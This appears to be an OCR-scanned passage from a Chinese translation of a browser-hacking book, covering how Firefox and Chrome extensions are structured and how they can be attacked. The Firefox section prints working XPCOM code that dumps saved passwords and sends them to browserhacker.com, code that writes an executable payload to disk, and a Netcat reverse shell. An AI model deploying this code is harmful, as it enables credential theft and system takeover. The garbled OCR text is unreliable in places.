O Components: 包含 XPCOM 组 件 ( 可 选 ) 


content 目 录 中 很 可 能 包含 你 感 兴 


进 制 库 。 








趣 的 内 容 , 其 中 有 主 JavaScript 扩 展 , 有 时 候 还 会 有 一 些 二 


图 7-3 展 示 了 FirePHP 扩 展 的 文件 结构 , 但 并 没有 把 扩展 中 的 所 有 元 素 都 展示 出 来 。 在 这 里 ， 
扩展 的 开发 者 并 没有 使 用 components 目 录 。 














eoo (@ firephp-0.7.1-fx.xpi 
Lale) (88 E mn om) (gr) [至 > 2 | Q 
Name “| Date Modified Size Kind 
®) CHANGELOG.md 02/04/2012 6:11 PM 16 KB Markdown document 
v [3 chrome Today 4:40 PM -- Folder 
v [3 content Today 4:41 PM -- Folder 
«| browserOverlay.xul 02/04/2012 6:11 PM 3KB Text Document 
«| firebugOverlay.xul 02/04/2012 6:11 PM 3KB Text Document 
> (i lib 02/04/2012 6:11 PM 一 Folder 
四 main.js 02/04/2012 6:11 PM 2 KB JavaScript source 
® mainOverlay.js 02/04/2012 6:11 PM 102 bytes JavaScript source 
> | viewer 02/04/2012 6:11 PM “+ Folder 
v @ skin Today 4:41 PM Folder 
> Ø classic 02/04/2012 6:11 PM os Folder 
E chrome.manifest 02/04/2012 6:11 PM 336 bytes Unix Executable File 
v [3 defaults Today 4:40 PM -- Folder 
> (Gi preferences 02/04/2012 6:11 PM -- Folder 


[dj install.rdf 


02/04/2012 6:11 PM 


1KB Text Document 





图 7-3 FirePHP 扩 展 的 目录 结 松 
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解读 更 新 过 程 

应 该 关注 的 一 个 文件 是 installrdf， 其 中 不 仅 包含 关于 安装 的 细节 ， 也 包含 关于 更 新 过 程 的 描 
述 。 有 关 更 新 扩展 的 ( 非 强制 性 ) 参数 是 updaateURL 和 updqateKey。 

Firefox 就 根据 这 两 个 参数 有 还 是 没有 ， 来 判断 扩展 应 该 如 何 更 新 。 如 果 这 两 个 参数 都 没有 ， 
则 由 Mozila 的 附加 程序 来 全 权 管 理 扩展 的 更 新 , 因而 攻击 更 新 过 程 的 可 能 性 也 比较 小 。 另 外 , 如 
果 指 定 了 updateKey， 或 者 updateURL 使 用 了 HTTPS URI 模 式 ， 那么 攻击 面 同样 有 限 。 

如 果 install.rdf 中 包含 updateKey 参 数 ， 则 其 中 会 包含 一 个 公 钥 。 此 时 , 一 定 有 一 个 对 应 的 私 
5H, 用 来 签署 从 指定 的 upaateURL 分 发 出 来 的 所 有 更 新 。 这 时 候 ，Firefox 会 验证 所 有 更 新 的 完整 
性 ， 从 而 阻止 你 干扰 更 新 过 程 。 

如 果 installrdf 中 包含 HTTP 模 式 的 upaateURL， 而 没有 包含 updateKkey， 那 就 是 一 个 安全 漏 
洞 。 这 意味 着 对 所 有 更 新 都 不 会 做 完整 性 校 验 ， 而 且 会 以 明文 方式 交付 。Firefox 启 动 后 ， 就 会 连 
接 到 updateURL， 然 后 请 求 update .raf， 其 中 包含 着 用 于 Firefox 决 定 是 否 更 新 的 版 本 信息 。 

正如 前 几 童 所 展示 的 , 采用 中 间 人 技术 可 以 控制 明文 通信 渠道 一旦 控制 了 更 新 渠道 ,发 送 
你 的 更 新 文件 就 是 小 菜 一 碟 了 。 

2. 理解 XUL 和 XBL 

XUL( XML User Interface Language, XML 用 户 界 面 语言 ), 是 Firefox 浏 览 如 中 用 于 表示 chrome 
中 可 见 内 容 的 语言 。 但 仅 此 而 已 ! 按 下 键盘 或 点 击 鼠 标 都 不 会 触发 操作 。 这 就 要 用 到 XBL (XML 
Binding Language，XMIL 绑 定语 言 ) 了 ， 它 负责 把 可 见 的 内 容 和 JavaScript 连 接 起 来 ， 实 现在 点 击 
按钮 什么 的 之 后 出 现 期 待 的 功能 。 

令 人 称奇 的 是 ， 就 连 Firefox 浏 览 需 本 身 也 是 使 用 XUL 写 的 ， 在 地 址 栏 中 输入 chrome:/ URL 
可 以 发 现 这 一 点 。 比 如 ， 在 地 址 栏 中 输入 chrome://browser/content/browser.xul， 可 以 看 到 图 7-4 所 
示 的 结果 。 

























































































图 7-4 ”Firefox 中 chrome:// 的 例子 





7-4 展 示 了 在 Firefox 中 加 载 URL chrome://browser/content/browser.xul 之 后 的 结果 。 得 到 的 结 
果 仍 然 是 有 功能 的 ， 因 为 这 些 XUL 是 通过 XBL 连 接 的 。 而且 , 在 第 二 个 地 址 栏 里 再 次 输入 相同 的 
URL， 义 会 创建 第 三 个 浏览 器 chrome。 

这 样 介绍 XUL 和 XBL 有 点 简单 化 , 但 我 们 毕 竞 只 想 提 供 一 个 简单 的 背景 , 因为 在 这 个 领域 里 
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的 攻击 大 部 分 还 只 是 理论 上 的 。 因此, 虽然 后 面 几 小 节 涉 及 的 内 容 与 利用 这 些 技术 中 的 漏洞 有 关 
系 ， 但 我 们 不 会 讨论 对 它们 的 直接 分 析 。 

3. 探索 XPCOM API 

XPCOM ( Cross Platform Component Object Model， 跨 平台 组 件 对 象 模型 ) API 为 浏览 器 扩展 
提供 了 更 多 功能 。XPCOM 就 是 在 浏览 器 中 使 用 的 路 平台 组 件 模 型 。 如 果 你 熟悉 微软 的 COM, JE 
么 可 以 把 XPCOM 想 象 为 Mozilla 自 家 的 COM。 

扩展 中 的 JavaScript 需 要 通过 某 种 方式 访问 XPCOM。 这 时 候 就 要 用 到 XPConnect 了 ， 它 在 
XPCOM 和 JavaScript 中 架 起 了 一 座 桥梁 。 通 过 XPConnect, JavaScript 能 够 调用 XPCOM 的 各 种 功能 。 
实际 上 ， 必 须要 通过 XPConnect 在 chrome:// 区 域 调用 XPCOM 的 API。 

Nick Freeman 和 Roberto Suggi Liverani 的 研究 4 发现 ， 扩 展 可 以 使 用 运行 在 操作 系统 环境 中 的 
XPCOM 组 件 。 下 面 我 们 就 来 介绍 一 下 他 们 的 研究 成 果 ， 以 及 可 以 通过 XPCOM 执 行 什么 操作 。 

(1) 利用 登录 管理 器 

与 其 他 浏览 器 一 样 ，Firefox 也 为 保存 用 户 访 问 过 的 Web 应 用 的 用 户 名 和 密码 提供 了 一 种 方 
ik. 而 这 些 敏感 信息 也 可 以 通过 XPCOM API 访 问 到 ,， 也 就 意味 着 可 以 通过 扩展 利用 登录 管理 器 。 

Firefox 中 的 nsILoginManager 接 口 用 于 管理 密码 , 包含 添加 、 删 除 、 修 改 和 查询 浏览 器 中 存储 
的 凭证 的 方法 。 这 些 功 能 都 可 以 通过 XPCOM API 访 问 到 ， 而 且 还 包括 用 途 极为 明显 的 get- 
AllLogins () 方 法 5; 


// 取得 登录 管理 对 象 

var 12m=Components.classes[ 
"Qmozilla.org/loginmanager;1"]. 
getService(Components.interfaces.nsILoginManager); 

































































// 从 登录 管理 对 象 中 取得 所 有 和 凭据 
allCredentials = 12m.getAllLogins({}); 


// 提取 主机 、 用 户 名 和 密码 
for (i=0;i<=allCredentials.length;i=i+1) { 
var url = "http://browserhacker.com/"; 
url += "?host=" + encodeURI (allCredentials[i].hostname); 
url += "&user=" + encodeURI (allCredentials[i] .username) ; 
url += "&password=" + encodeURI (allCredentials[i] .password) ; 
window.open (url) ; 


} 

以 上 代码 展示 了 如 何 把 Firefox 登 录 管 理 器 中 的 所 有 内 容 都 提取 出 来 "。 执 行 这 段 代 码 ， 会 向 
位 于 http:/browserhacker.com 的 Web 服 务 器 发 送 包 含 用 户 和 凭证 的 HTTP 请 求 。 图 7-5 是 一 张 截图 ， 展 
示 了 Apache 日 志 中 记录 的 这 个 请 求 。 






































Al7-5 Apache 日 志 中 记录 着 偷 来 的 用 户 赁 证 信息 
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(2) 读 取 文 件 系统 

SOP 不 适用 于 扩展 中 的 URL。 换 名 话说 ， 有 权限 的 chrome:/ 区 域 中 的 指令 ， 实 际 上 可 以 不 受 
限制 地 访问 任意 源 。 此 时 ，URI 模 式 fle:/ 变 得 非常 有 用 。 

利用 这 个 额外 的 特权 , 可 以 使 用 aocument .ReadURL .readqFile 方 法 。 因 此 在 chrome:/ 区 域 
中 ， 可 以 通过 该 方法 读 取 文 件 系统 中 的 任意 文件 : 


Var fileToRead="file:///C:/boot.ini"; 
var fileContents-document.ReadURL.readFile(fileToRead); 


在 扩展 的 这 个 特权 环境 中 ， 前 面 的 代码 能 够 读 取 文件 系统 中 的 ci\boot.ini 文 件 ”。 
(3) 写 入 文件 系统 
Firefox 用 来 写 入 文件 系统 的 XPCOM API 是 nsIFileOutputStream’ 与 前 一 节 讨 论 的 访问 本 地 文 
件 类 似 ， 通 过 这 个 接口 ， 浏 览 絮 可 以 在 文件 系统 的 任意 位 置 写 入 内 容 。 
利用 这 个 XPCOM API 可 以 在 攻击 中 完成 更 多 任务 。 比 如 ， 可 以 利用 它 部 署 Metasploit 
Meterpreter 或 其 他 远程 访问 工具 等 payload: 
function makeFile(bdata) { 
var workingDir= Components.classes[ 
"@mozilla.org/file/directory_service;1"] 


.getService(Components.interfaces.nsIProperties) 
.get("Home", Components.interfaces.nsIFile); 
























































var aFile = Components.classes["@mozilla.org/file/local;1"] 
.createlInstance(Components.interfaces.nsILocalFile); 
aFile.initWithPath( workingDir.path + "\\filename.exe" ); 
aFile.createUnique ( 
Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 777); 


var stream = Components.classes[ 
"Qmozilla.org/network/safe-file-outputstream;1"] 
.createInstance(Components.interfaces.nsIFileOutputStream); 
stream.init(aFile, 0x04 | 0x08 | 0x20, 0777, 0); 
stream.write(bdata, bdata.length); 
if (stream instanceof Components.interfaces.nsISafeOutputStream) { 
stream.finish(); 
} else { 
stream.close(); 
} 
} 


代码 中 的 makeFile() 方 法 使 用 XPCOM 写 入 (Windows ) 文件 系统 。 别 忘 了 ， 要 成 功 执行 ， 
需要 chrome:// 区 域 的 特权 。 

(4) 执行 操作 系统 命令 

当然 , 我们 还 想 知道 怎么 在 目标 操作 系统 上 执行 程序 。 只 有 这 样 才能 回 连 到 你 的 服务 器 ,从 
而 运行 你 的 payload。XPCOM 也 提供 了 相应 的 路 径 ! 

在 Mozilla 的 领地 中 ，nsIProcess 是 一 个 可 执行 的 进程 。 可 以 在 Firefox 扩 展 中 利用 它 ， 来 执行 存 
储 在 目标 文件 系统 中 的 程序 。 以 下 代码 演示 了 如 何在 Linux 操 作 系统 中 ， 使 用 Netcat 执 行 反 向 shell: 
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var lFile = Components.classes["@mozilla.org/file/local;1"] 
.createInstance(Components.interfaces.nsILocalFile); 

var lPath = "/bin/nc"; 

lFile.initWithPath(lPath); 

var process = Components.classes["@mozilla.org/process/util;1"] 

.createInstance (Componen 

ts.interfaces.nsIProcess); 

process.init(lFile); 

process.run(false,['-e', '/bin/bash', 'browserhacker.com', '12345'],4); 


这 个 例子 同时 使 用 了 nsILocalFile 和 nsIProcess 来 达到 控制 目标 浏览 器 所 在 系统 的 日 的 。 图 7-6 




















和 图 7-7 是 两 张 截图 ， 展 示 了 执行 以 上 代码 以 及 反 向 shell 的 结果 。 


mainjs* x | | datas.html x 
1[const (Cc, C1) = Tequire("chrone"); 一 
2 
3|var 1File = Cc["bmozllla.org/file/local;l"].createInstVyhncefCl.nsILocalFile); 
; 





4|var lpath = "/bin/nc.traditional" 

5 | 1File.initwithPath(1Path); 

6|var process = Cc["Omozilla.org/process/util;i"].cyéateInstance(Ci.nsIProcess); 
7 | process. init(1File); 

8 | process. run(fa1se, [*-e*, '/bin/bash', 'browserhacker.com", '12345'],4); 


图 7-6 ” 反 向 shell 的 代码 














图 7-7 反 向 shell 连 接 


4. 检查 安全 模型 

Firefox 扩 展 拥有 浏览 器 的 全 部 权限 。 换 句 话 说， 任何 运 行 于 chrome:/ 区 域 的 指令 都 不 会 受 限 
制 。 这 里 的 重点 是 ， 没 有 沙 箱 的 概念 , 也 没有 安全 边界 。 这 种 非常 简陋 的 安全 模型 让 扩展 可 以 直 
接 访 问 浏览 器 API、 文 件 系统 和 操作 系统 。 

探索 Chrome 区 域 

Firefox 中 有 特权 的 chrome:// 区 域 有 自己 的 URI 模 式 ( chrome:// )， 人 允许 扩展 开发 者 通过 完善 的 
API 访 问 浏览 器 。 比 如 ， 扩 展 可 以 重新 配置 浏览 器 及 其 他 扩展 ， 可 以 取得 cookie， 可 以 存储 密码 ， 
也 可 以 下 载 文 件 并 执行 (浏览 器 所 在 的 ) 操作 系统 的 命令 。 

与 下 一 小 节 要 介绍 的 Chrome 浏 览 如 不同，Firefox 扩 展开 发 者 不 能 限制 对 不 同 权 限 级 别 的 访 
问 ， 因 而 扩展 就 拥有 了 所 有 权限 。 

在 特权 环境 中 执行 远程 代码 是 Firefox 扩 展 中 最 常见 的 漏洞 ?。 因 为 扩展 与 浏览 器 在 同一 个 权 
限 级 别 运 行 "， 所 以 成 功 的 侵入 也 将 获得 相同 的 权限 。 在 此 基础 上 ,侵入 者 可 以 利用 扩展 API 执 
行 操作 系统 命令 ， 从 而 形成 一 条 简单 而 可 靠 的 利用 途径 。 






































7.1.5 理解 Chrome 扩展 
与 Firefox 扩 展 类 似 ，Chrome 扩 展 运行 时 拥有 的 权限 也 很 高 。Chrome 扩 展 可 以 做 到 正常 情况 
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下 网 页 中 的 JavaScript 代 码 做 不 到 的 事 。 比 如 ，Chrome 扩 展 可 以 访问 所 有 打开 的 标签 页 、 发 送 跨 
域 请 求 、 读 取 cookie( 包括 那些 标记 为 HttpOnly 的 cookie )， 等 等 。 

如 图 7-8 所 示 ，Chrome 比 Firefox 的 架构 要 复杂 一 些 ， 除 了 包含 有 特权 的 chrome:// 区 域 ， 还 有 
安全 边界 。 





:Chrome 浏览 





: : chrome:// 区 域 














图 7-8 ”相关 的 Chrome 扩 展 结 构 


每 个 Chrome 扩 展 都 包含 一 个 清单 文件 (manifest file )， 以 及 由 后 台 页 面 、UI 页 面 及 内 容 脚 本 
构成 的 其 他 组 件 。 除 此 之 外 ,还 可 以 有 其 他 组 件 ， 但 这 些 是 我 们 要 讨论 的 重点 。 

Chrome 扩 展 在 后 台 静 默 更 新 ， 不 会 通知 用 户 。 因 此 ， 攻 击 目标 很 可 能 安装 了 最 新 和 功能 最 
强 的 扩展 版 本 。 

1. 分 析 源 代码 

分 析 Chrome 扩 展 不 必 和 掌握 高 深 的 逆向 工程 技术 , 因为 它们 都 是 用 JavaScript 和 HTML 写 的 (你 
肯定 猜 到 了 ! )。 想 了 解 哪个 扩展 ， 只 要 从 Chrome Web Store" 上 下 载 它 就 可 以 了 。Chrome 使 用 .crx 
作为 扩展 文件 名 的 后 级 ， 因 此 很 容易 找到 它们 。 扩 展 的 结构 就 是 一 个 压缩 目录 ， 与 Firefox 扩 展 很 
相似 。 然 后 解压 缩 扩展 代码 ， 在 你 常用 的 IDE 中 打开 就 行 了 。 换 句 话说 ， 只 要 使 用 静态 分 析 工 具 
并 通过 人 工 代 码 检查 ， 就 可 以 发 现 扩 展 的 漏洞 所 在 。 

有 时 候 ， 光 有 静态 分 析 还 不 够 。 怎 么 办 呢 ? Chrome 可 以 帮 到 你 ! 把 扩展 安装 到 Chrome 浏 览 




































































套 ， 然后 动态 进行 调试 。 在 chrome://extensions 中 切换 到 开发 者 模式 , 就 可 以 运行 解压 缩 到 你 选 定 
的 目录 的 扩展 。 


启用 开发 者 模式 后 ， 可 以 通过 Inspect Views 选 项 打开 Chrome Developer Tools Ho ir 
Extensions 标 签 页 中 Inspect Views 后 面 的 文件 。 图 7-9 展 示 了 Amazon 扩 展 中 的 开发 者 模式 选项 。 
如 图 所 示 , 需要 单 击 background.html 链 接 , 但 并 不 总 这 样 , 比如 其 他 扩展 的 文件 名 可 能 会 不 同 。 
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© o0 " d Extensions 


X V e Chrome Web Store - Exte x \( a Amazoncom-Wishtist x \ i. 








€ > Q fi D chrome://extensions 





Chrome Extensions 


Hist 
istory | Load unpacked extension... 
Extensions 


Sens 4. Add to Amazon Wish List 


Inspect views: 


Pack extension... | 


1.0.0.10 
Add products from any website to your Amazon Wish List Permissions Visit website 
ID: ciagpekplgpbepdgggflgmahnjgiaced 





MG IM Developer mode 


L Update extensions now | 


8 


i. Enabled 


: background.htm! sia 
LJ Allow in incognito Options 


图 7-9 


访问 开发 者 工具 


图 7-10 展 示 了 打开 的 开发 者 工具 。 图 中 所 示 为 浏览 扩展 代码 、 执 行 JavaScript、 添 加 断 点 、 修 
改 代 码 等 的 情景 。 使 用 这 个 工具 可 以 动态 地 研究 扩展 的 行为 。 


目 O Developer Tools - chrome-extension://ciagpekplgpbepdgggflgmahnjgiaced/backg... 7 
Elements Resources Network | Sources | Timeline Profiles Audits Console 























四 | background.js x |» F 
zZ 





atj? 


7^ 





13 var updatePushDownDate = function(reset 
var settings = AMZUWLXT.Settings.ge 
var deltaDays - [0, 30, 90, 180, 3€ 
var defaultDelta - 30; 


var curPushInterval = settings.push 
var newPushInterval; 
if (reset) { 
newPushInterval = "1"; 
) else if (curPushInterval -- delta 
newPushInterval = curPushInterv 
) else { 
var curPushIntervallnteger = pa 
newPushInterval = curPushInterv 


) 


| v Watch Expressions 


No Watch Expressions 
| v Call Stack 
| v Scope Variables 
v Breakpoints 
@ background.js:29 
AMZUWLXT.Settings.set({"pushInterval" : 
| » DOM Breakpoints 
|» XHR Breakpoints + 
| > Event Listener Breakpoints 
| » Workers 


n. 


AMZUWLXT.Settings.set(("pushInterva 





图 7-10 ”调试 扩展 


2. 分 析 清单 文件 
Chrome 扩 展 必须 包含 清单 文件 manifestjson。 不 难 发 现 ， 
展 所 要 使 用 的 资源 。 
下 面 的 代码 展示 了 一 个 示例 manifestjson 文 件 的 内 容 : 
( 
"name": "extensionName" i 


"version": "versionString", 
"manifest_version": 2 


这 个 文件 是 JSON 格 式 。 它 描述 了 扩 


<rest of content> 


清单 文件 第 
sid 情况 下 ， 
用 了 这 些 权 限 。 


1 版 的 安全 限制 相对 较 少 ， 因 此 也 对 攻击 流行 的 Chrome 扩 展 提供 了 很 多 机 会 “。 
这 个 版 本 允许 开发 者 访问 特权 API。 相 应 地 ， 开 发 者 也 就 在 自己 的 扩展 中 慷慨 地 使 
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为 此 ， 谷 歌 开 发 了 清单 文件 第 2 版 ， 采 用 了 默认 安全 的 策略 。 其 中 最 大 的 改变 就 是 对 扩展 代 
码 库 的 某 些 代 码 ， 采 用 了 CSP (Content Security Policy， 内 容 安全 策略 ) 2。 这样 做 是 为 了 降低 
XSS 的 威胁 ， 极 大 提升 了 安全 性 。 

本 书 出 版 之 际 ，Chrome 不 再 支持 使 用 清单 文件 第 1 版 的 扩展 ， 只 支持 使 用 第 2 版 的 扩展 。 而 
在 本 书写 作 时 ， 谷 歌 也 在 致力 于 减少 基于 第 1 版 开发 的 扩展 数量 。 

在 这 个 过 渡 期 间 ， 出 现 了 很 多 基于 第 1 版 扩展 的 利用 案例 。 很 多 情况 下 ， 相 同 (或 类 似 ) 的 
利用 技术 也 适用 于 清单 文件 第 2 版 。 接 下 来 几 小 节 我 们 会 看 几 个 基于 清单 文件 第 1 版 的 例子 , 因为 
可 以 更 容易 讲 清楚 攻击 的 过 程 。 在 具备 某 些 先决 条 件 的 情况 下 ( 这 些 条 件 也 会 介绍 )， 这 些 技术 
同样 可 以 用 于 清单 文件 第 2 版 的 扩展 。 

最 重要 的 是 要 知道 , 第 2 版 的 清单 文件 规定 了 很 多 安全 规则 , 而 基于 第 2 版 的 扩展 的 攻击 面 就 
更 小 了 。 而 有 些 针对 第 1 版 的 攻击 手段 仍然 适用 于 第 2 版 ， 只 不 过 前 提 条 件 更 多 了 。 

3. 内 容 脚本 

内 容 脚本 负责 与 加 载 到 浏览 器 中 的 网 页 内 容 交 互 。 每 个 网 页 中 可 能 运行 多 个 内 容 脚本 。 
Chrome 扩 展 中 的 这 个 组 件 拥 有 直接 访问 DOM 的 权限 ， 攻 击 面 最 大 ， 因 此 也 是 最 不 可 信 的 。 虽 然 
严格 来 讲 内 容 脚本 是 扩展 的 一 部 分 ， 但 有 时 候 把 它 想 象 成 网 页 的 一 部 分 会 更 有 帮助 。 

不 过 ， 这 个 部 分 非常 特殊 ， 它 既 不 同 于 其 他 扩展 脚本 ， 也 不 同 于 运行 在 网 页 中 的 标准 脚本 。 
比如 ， 内 容 脚 本 不 能 调用 在 网 页 源 中 定义 的 任何 函数 ， 反 之 亦 然 。 

因此 ， 虽 然 DOM 访 问 是 共享 的 ， 但 内 容 脚本 运行 在 自己 的 独立 王国 (Isolated World ) 之 中 。 
这 个 独立 王国 具有 隔离 扩展 访问 的 途径 ， 我 们 将 在 下 一 小 节 详 细 介绍 。 

内 容 脚 本 只 能 访问 扩展 API“， 不 能 访问 关联 扩展 页 面 中 的 变量 和 函数 。 它 们 甚至 不 能 访问 
其 他 内 容 脚 本 ,也 不 能 对 扩展 所 在 页 面 发 送 跨 域 请 求 。 内 容 脚 本 与 扩展 的 其 他 部 分 是 隔离 的 ,与 
安全 边界 之 内 的 环境 是 隔离 的 ， 如 图 7-8 所 示 。 这 就 是 为 什么 有 时 候 可 以 把 它们 想象 成 网 页 的 一 
部 分 ， 而 不 是 扩展 的 一 部 分 。 

然而 , 内 容 脚 本 又 的 的 确 确 是 扩展 的 组 件 ， 从 它们 稍微 被 提高 的 访问 权限 可 以 清楚 地 看 到 这 
一 点 。 它 们 可 以 对 任何 列 在 其 清单 文件 中 的 来 源 ， 发 起 跨 域 XHR 请 求 : 


"permissions": [ 
"http:// tht, 
"https://*/*" 

] 


前 面 清单 文件 中 的 JSON 代 码 表明 ， 内 容 脚 本 可 以 对 任何 HTTP 和 HTTPS 源 发 送 XMLHttp- 
Request 请 求 。 关 键 在 于 ,与 这 些 请 求 同 时 发 送 的 ,还 有 用 户 正在 交互 的 Web 应 用 所 设置 的 cookie。 
别 忘 了 ， 扩 展 还 可 以 读 取 响应 。 

换 句 话说 , 用 户 已 经 认证 过 的 任何 源 的 会 话 令 牌 , 都 会 随同 扩展 的 XxMLHttpRequest 请 求 一 
道 发 送 。 关 于 这 一 点 ， 将 在 7.3.4 节 再 讨论 。 

4. UIN A 
UI 页 面 指 的 是 选项 页 、 弹 出 层 ， 或 其 他 展示 给 用 户 的 页 面 。 比 如 ， 某 些 扩展 可 能 会 提供 设置 
页 。 通 常 这 种 页 面 就 是 在 manifest.json 文 件 中 声明 的 settings.html 文 件 。 此 外 ， 在 地 址 栏 上 点 击 扩 
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展 图 标 出 现 的 下 拉 区 域 ， 也 属于 UI 页 面 。 总 之 ，UI 页 面 就 是 构成 扩展 用 户 界 面 的 HTML 资 源 。 

对 我 们 而 言 ， 最 重要 的 是 知道 运行 在 这 些 UI 页 面 中 的 JavaScript 拥 有 较 高 权限 。 其 中 的 脚本 
可 以 访问 丰富 的 API (在 扩展 安全 边界 的 限制 之 内 )。 

UI 页 面 不 能 直接 访问 DOM， 必 须 利 用 内 容 脚 本 才 行 。 在 内 容 脚 本 与 可 见 的 页 面 之 间 ， 有 一 
道 严格 的 安全 边界 。 内 容 脚 本 不 能 调用 在 后 台 页 面 和 UI 页 面 中 定义 的 函数 。 所 有 通信 都 必须 借助 
消息 来 完成 。 这 一 点 会 在 稍 后 的 “安全 模型 ”小 节 详 细 介 绍 。 

5. 后 台 页面 

BARE (在 使 用 过 程 中 ) 可 以 视 为 扩展 的 核心 。 每 个 扩展 至 多 有 一 个 后 台 页 面 , 与 打开 多 
少 窗 口 或 标签 页 无 关 。 不 过 ,隐身 标签 页 男 当 别论 , 一 般 来 说 ， 所 有 打开 的 窗口 和 标签 页 是 共享 
后 台 页 面 的 。 

后 面 页 面 的 权限 较 高 ， 并且 会 随 浏览 器 运行 而 运行 。 由 于 权限 较 高 , 后 台 页 面 可 以 帮 我 们 实 
现 各 种 目标 。 攻 击 后 台 页 面 乍 一 听 很 简单 ， 但 Chrome 扩 展 对 此 确实 提供 了 很 强 的 防护 。 后 台 页 
面 使 用 内 容 安全 策略 ， 因 此 如 果 开 发 者 没有 暴露 什么 弱点 ， 那 我 们 要 得 偿 可 就 难 了 。 

或 许 把 后 台 页 面 想象 为 传统 的 客户 端 - 服 务 器 模型 中 的 服务 器 组 件 ， 会 更 有 助 于 我 们 理解 它 
的 作用 。 内 容 脚本 采用 预定 义 的 消息 格式 与 后 台 页 面 通信 。 这 些 消息 格式 是 有 限制 的 ， 同 样 也 是 
源 于 安全 边界 ， 为 了 实现 攻击 我 们 必须 绕 过 它 。 

6. NPAPI 插 件 

NPAPI ( Netscape Plugin Application Programming Interface， 网 景 插件 应 用 编程 接口 ) 5 是 一 
个 古老 的 跨 平台 :插件 架构 。 下 一 章 还 会 进一步 讨论 插件 的 话题 ， 之 所 以 在 这 里 提 到 它 ， 是 因为 
Chrome 扩 展 可 以 在 JavaScript 中 调用 插件 。 

NPAPI 插 件 在 Chrome 沙 箱 外 部 运行 ,拥有 用 户 权 限 。 为 此 ， 如 果 可 以 在 扩展 中 控制 插件 ， 那 
么 它们 将 是 攻击 的 理想 目标 。 谷 歌 并 没有 遗漏 这 个 重要 的 方面 ， 它 已 经 宣布 所 有 NPAPI 插 件 在 进 
入 Chrome Web Store 之 前 必须 经 过 人 工 审核 ”。 

NPAPI 搬 件 可 能 存在 缓冲 区 游 出 、 格 式 字符 串 pug 和 命令 注入 等 漏洞 。 与 其 他 编译 程序 类 
似 ， 这 些 超出 了 本 书 要 讨论 的 范畴 。 不 过 ， 我 们 还 是 要 在 这 里 讲 一 讲 注入 漏洞 ， 并 在 后 面 某 一 
节 中 深入 研究 它 。 当 然 ， 插 件 也 会 在 下 一 章 深入 讨论 。 不 过 现在 只 涉及 帮助 我 们 理解 攻击 扩展 
的 概念 。 

下 面 的 例子 展示 了 某 些 manifest.json 的 内 容 ， 这 些 内 容 表 明 目 标 扩展 在 使 用 插件 : 





















































































































































"name": "BHH Extension", 
"plugins": [ 
("path": "bhh extension plugin.dll" } 


l, 

ee 

如 果 你 在 目标 扩展 中 看 到 前 面 的 代码 , 那么 就 有 必要 探索 相关 搬 件 可 能 存在 的 漏洞 。 下 一 章 
还 会 进一步 讨论 插件 。 
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7. 安全 模型 

Chrome 扩 展 运 行 在 使 用 chrome-extension:// URI 模 式 的 源 中 。 这 个 源 就 是 攻击 扩展 时 作为 目 
标的 浏览 器 中 拥有 特权 的 chrome:// 区 域 。 由 于 同 源 策略 的 限制 , 通常 的 网 站 不 能 访问 这 些 Chrome 
扩展 源 。 

由 于 运行 在 特权 区 域 ， 扩 展 可 以 访问 和 修改 白 名 单 中 源 的 内 容 。 在 manifest.json 文 件 中 ， 扩 
展 可 以 运行 于 其 中 的 源 是 以 匹配 模式 的 形式 给 出 的 。 

(1) 独立 王国 

Chrome 扩 展 使 用 了 一 个 叫 作 “独立 王国 ”的 概念 。 在 这 里 面 ， 加 载 网 页 中 的 脚本 与 内 容 脚 
本 是 相互 隔离 的 。 虽 然 脚 本 可 以 访问 和 修改 DOM， 但 不 能 直接 访问 其 他 脚本 的 独立 王国 。 这 样 
就 减少 了 攻击 者 利用 内 容 脚本 中 漏洞 的 自由 。 

为 了 进一步 将 内 容 脚本 与 页 面 脚本 分 离 ，Chrome 为 每 个 独立 王国 中 的 DOM， 都 创建 了 单独 
的 表现 形式 。 对 所 有 脚本 而 言 ， 这 些 都 是 透明 的 。 其 他 脚本 可 以 实时 观察 DOM 的 变化 ， 但 不 能 
在 同一 个 结构 中 起 作用 。 

无 论 如 何 , 开发 者 在 开发 扩展 时 不 会 注意 独立 王国 。 可 是 ， 如 果 你 想 直 接 调用 内 容 脚 本 中 的 
函数 ， 那 就 会 注意 到 独立 王国 。 

(2) 匹配 模式 

匹配 模式 也 用 于 限制 扩展 的 XxMLHttpRequest 对 象 。 本 章 前 面 讨论 过 , 扩展 与 网 站 不 同 ,可 
以 使 用 XHR 对 象 发 送 请 求 并 读 取 跨 域 响 应 , 并 且 只 被 声明 的 匹配 模式 限制 。 以 下 代码 示例 演示 了 
基于 http://browservictim.com/ 的 匹配 模式 : 


"content scripts": [ 


( 



















































































"matches": ["http://browservictim.com/*"], 
"CSS": ["styles.css"], 
"Jet d['secript«jse"] 


} 
] 


特别 要 注意 匹配 模式 中 包含 通配符 的 扩展 ， 比 如 file:///*、nttp://*/*、*://*/* 或 
<all_urls>。 这 些 扩展 存在 被 用 户 访问 的 任意 网 站 利用 的 可 能 性 。 

(3) 权限 

很 多 Chrome 扩 展 请 求 〈 并 获得 了 ) 浏览 器 中 的 更 高 权限 ， 于 是 它们 就 可 以 执行 网 站 来 源 做 
不 到 的 操作 。 这 些 权 限 的 提升 对 目标 有 用 ,对 攻击 扩展 来 说 也 有 用 。 鉴 于 扩展 可 以 覆盖 同 源 策 略 
的 限制 ， 这 一 点 就 显得 尤其 有 用 。 

由 于 运行 这 种 特权 代码 明显 存在 安全 隐患 ,因此 开发 者 必须 在 安装 时 就 明确 要 使 用 哪些 API。 
相应 的 权限 同样 也 在 manifestjson 文 件 中 列 出 ， 比 如 下 面 这 个 例子 : 

"permissions": [ "http://*/*", "https://*/*", "tabs", "cookies" ], 

这 个 扩展 在 安装 的 时 候 , 用 户 会 看 到 一 个 确认 对 话 框 , 以 人 类 可 读 的 方式 告诉 用 户 扩 展 在 请 
求 什 么 权限 “。 只 要 用 户 点 击 了 Add 安 装 扩展 ， 那 么 对 话 框 中 列 出 的 权限 就 相当 于 全 部 赋予 了 扩 
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展 ， 如 图 7-11 所 示 。 


Add "Quick Note"? 


It can: 
* Access your data on all websites 


* Access your tabs and browsing activity 





图 7-11 Quick Note 扩 展 在 安装 时 请 求 权 限 


Chrome Web Store 中 的 很 多 扩展 ， 在 安装 时 都 会 请 求 “Access your data on all websites" ( 访问 
你 在 所 有 网 站 中 的 数据 ) 这 项 权限 。 同 意 安装 这 些 扩展 之 后 ,它们 就 获得 了 访问 你 打开 的 所 有 网 
站 的 权限 ， 包 括 使 用 HTTPS URI 模 式 访问 的 网 站 。 

